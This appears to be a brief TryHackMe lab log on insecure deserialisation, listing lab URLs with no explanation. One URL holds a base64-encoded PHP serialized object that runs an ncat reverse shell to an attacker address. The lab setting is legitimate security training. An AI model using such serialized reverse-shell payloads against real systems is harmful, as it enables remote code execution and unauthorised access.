
It’s the end of the week, Friday is here and we are back at it again... on THM!
Today we kick off with the Advanced Server-Side Attacks section of the Web Application Pentesting Pathway.
The first box we are going to tackle today (or at least attempt to) will be Insecure Deserialisation.

http://10.10.177.40/who/index.php

http://10.10.177.40/who/index.php~

10.10.102.51/case2/?decode=TzoxNzoiTWFsaWNpb3VzVXNlckRhdGEiOjE6e3M6NzoiY29tbWFuZCI7czozODoibmNhdCAtbnYgMTAuMTEuMTI1LjE1MCA0NDQ0IC1lIC9iaW4vc2giO30=

http://10.10.102.51:8089/get-key

http://10.10.102.51:8089/

Until next time & don’t sleepwalk through life!
Bless
